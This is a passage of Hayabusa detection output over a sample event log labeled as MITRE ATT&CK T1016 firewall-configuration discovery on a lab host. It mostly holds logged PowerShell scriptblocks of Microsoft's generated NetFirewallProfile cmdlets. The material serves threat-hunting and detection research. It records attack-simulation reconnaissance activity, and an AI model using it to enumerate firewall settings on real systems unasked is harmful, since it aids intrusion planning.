-contains $_ } { 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.036 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallProfile ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; 
value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallProfile' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = 
$myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] 
[Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallProfile' function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ll.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', 
${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; 
ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdlet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.051 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,ization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
